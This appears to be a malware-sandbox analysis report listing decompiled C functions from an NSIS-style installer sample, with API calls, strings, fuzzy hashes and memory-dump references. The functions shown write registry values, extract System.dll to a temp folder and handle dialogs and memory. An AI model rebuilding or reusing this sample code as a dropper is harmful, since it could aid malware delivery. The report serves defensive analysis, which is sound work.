Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D10(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406544(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406544(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406544(_t44, _t50, 0x423708, 0x423708, _a8);
				wsprintfW(_t34 + lstrlenW(0x423708) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291f8, _a4, 0x423708);
			}

0x00404d19
0x00404d1e
0x00404d26
0x00404d27
0x00404d34
0x00404d3c
0x00404d3d
0x00404d3f
0x00404d41
0x00404d43
0x00404d46
0x00404d46
0x00404d4d
0x00404d53
0x00404d53
0x00404d5a
0x00404d61
0x00404d64
0x00404d67
0x00404d67
0x00404d6b
0x00404d7b
0x00404d7d
0x00404d80
0x00404d29
0x00404d29
0x00404d30
0x00404d30
0x00404d88
0x00404d93
0x00404da9
0x00404dba
0x00404dd6

APIs

lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
wsprintfW.USER32 ref: 00404DBA
SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD

Strings

%u.%u%s%s, xrefs: 00404D9B

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
Opcode Fuzzy Hash: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5c8 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv58DC.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv58DC.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv58DC.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsv58DC.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp
API String ID: 2655323295-608326223
Opcode ID: 63ba579be38003c5c2846091642c2120a180d45c4fa1a1d755e9eebca7bc3d7e
Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
Opcode Fuzzy Hash: 63ba579be38003c5c2846091642c2120a180d45c4fa1a1d755e9eebca7bc3d7e
Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68

Uniqueness

Uniqueness Score: -1.00%

Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405DD6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405dd7
0x00405de4
0x00405de5
0x00405df0
0x00405df8
0x00405df8
0x00405e00

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD

Uniqueness

Uniqueness Score: -1.00%

Function 70AC10E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E70AC10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x70ac506c = _a8;
				 *0x70ac5070 = _a16;
				 *0x70ac5074 = _a12;
				_a12( *0x70ac5048, E70AC1651, _t73);
				_t66 =  *0x70ac506c +  *0x70ac506c * 4 << 3;
				_t27 = E70AC12E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x70ac5040;
							if( *0x70ac5040 == 0) {
								goto L26;
							}
							E70AC1603( *0x70ac5074, _t31 + 4, _t66);
							_t34 =  *0x70ac5040;
							_t86 = _t86 + 0xc;
							 *0x70ac5040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E70AC1312(E70AC135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E70AC1381(_t80, E70AC12E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E70AC1603(_t10,  *0x70ac5074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x70ac5040;
							 *0x70ac5040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x70ac5070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E70AC1603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x70ac506c +  *0x70ac506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E70AC1603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x70ac5070);
						 *( *0x70ac5070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x70ac10eb
0x70ac1100
0x70ac1109
0x70ac110e
0x70ac1119
0x70ac111c
0x70ac1125
0x70ac1129
0x70ac112b
0x70ac12b0
0x70ac12ba
0x70ac12ba
0x70ac1132
0x70ac1132
0x70ac1137
0x70ac1138
0x70ac113a
0x70ac113d
0x70ac1256
0x70ac1259
0x70ac1271
0x70ac1271
0x70ac1278
0x00000000
0x00000000
0x70ac1285
0x70ac128a
0x70ac128f
0x70ac1294
0x70ac129a
0x70ac129b
0x00000000
0x70ac129b
0x70ac125b
0x70ac125e
0x70ac11bc
0x70ac11bf
0x70ac11c2
0x70ac11cb
0x70ac11d0
0x00000000
0x70ac11d1
0x70ac1264
0x70ac1266
0x70ac11a2
0x70ac11a5
0x70ac11a8
0x70ac11b1
0x00000000
0x70ac11b1
0x70ac1164
0x70ac1165
0x70ac1177
0x70ac1180
0x70ac1184
0x70ac118e
0x70ac1191
0x70ac1193
0x70ac1193
0x00000000
0x70ac1165
0x70ac1143
0x70ac1218
0x70ac121d
0x70ac1221
0x70ac1223
0x70ac122c
0x70ac122f
0x70ac1238
0x70ac123d
0x70ac123d
0x70ac1247
0x70ac124a
0x00000000
0x70ac1250
0x70ac1149
0x70ac114c
0x70ac11e9
0x70ac11ed
0x70ac11f7
0x70ac11fb
0x70ac1205
0x70ac120a
0x70ac1211
0x00000000
0x70ac1211
0x70ac1152
0x70ac1155
0x00000000
0x00000000
0x70ac115b
0x70ac115e
0x70ac11b8
0x00000000
0x70ac11b8
0x70ac1160
0x70ac1162
0x70ac119e
0x00000000
0x70ac119e
0x00000000
0x70ac12a1
0x70ac12a1
0x70ac12ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 70AC1171
GlobalAlloc.KERNEL32(00000040,?), ref: 70AC11E3
GlobalFree.KERNEL32 ref: 70AC124A
GlobalFree.KERNEL32(?), ref: 70AC129B
GlobalFree.KERNEL32(00000000), ref: 70AC12B1

Memory Dump Source

Source File: 00000001.00000002.4884852064.0000000070AC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 70AC0000, based on PE: true

Associated: 00000001.00000002.4884744827.0000000070AC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4884980920.0000000070AC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4885091070.0000000070AC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70ac0000_file.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 75418f756601b04860e280616a6724a7bb4d7b4c6fd9c5ddaf58c645cb4f6bd4
Instruction ID: 8738674abc677f4fa6006269590e28db1603766e7196f0e47953f90a657edab0
Opcode Fuzzy Hash: 75418f756601b04860e280616a6724a7bb4d7b4c6fd9c5ddaf58c645cb4f6bd4
Instruction Fuzzy Hash: 90517DBA600201DFDB00CFB9C944B6B77B8FB0A315F264529FA06DB324EB34E9418B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E00406529("C:\Users\Arthur\AppData\Local\Temp\nsv58DC.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsv58DC.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsv58DC.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adc8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E00406467(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060D8(_t31, _t31) >= 0) {
						_t14 = E004060A9(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsv58DC.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsv58DC.tmp, xrefs: 00402683
C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp$C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll
API String ID: 1659193697-671314679
Opcode ID: 8fc662652209aebcb66ca668e803c3ef4494e3b7477fa7ec7defb8fff3da898b
Instruction ID: 065fa95b7f6ceba1475350b2e5fd0629383d1058fb688f50996a10954fc95768
Opcode Fuzzy Hash: 8fc662652209aebcb66ca668e803c3ef4494e3b7477fa7ec7defb8fff3da898b
Instruction Fuzzy Hash: D011E772B00305BBCB10BBB18E4AE9E76B0AF40749F21443FF002B62C1D6FD8891965E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420ec0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42a22c;
						if(_t2 >  *0x42a22c) {
							_t3 = CreateDialogParamW( *0x42a220, 0x6f, 0, E00402F93, 0);
							 *0x420ec0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406910(0);
					}
				} else {
					_t6 =  *0x420ec0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420ec0 = 0;
					return _t6;
				}
			}

0x00403020
0x0040303a
0x00403040
0x0040304a
0x00403050
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405EDE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406507(0x425f10, _a4);
				_t21 = E00405E81(0x425f10);
				if(_t21 != 0) {
					E0040678E(_t21);
					if(( *0x42a238 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f10 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f10);
							_push(0x425f10);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040683D();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E22(0x425f10);
								continue;
							} else {
								goto L1;
							}
						}
						E00405DD6();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405eea
0x00405ef5
0x00405ef9
0x00405f00
0x00405f0c
0x00405f1c
0x00405f1e
0x00405f36
0x00405f37
0x00405f3e
0x00405f3f
0x00000000
0x00000000
0x00405f22
0x00405f29
0x00405f31
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f29
0x00405f41
0x00000000
0x00405f55
0x00405f0e
0x00405f14
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f14
0x00405efb
0x00000000

APIs

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,76D23420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76D23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,76D23420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76D23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
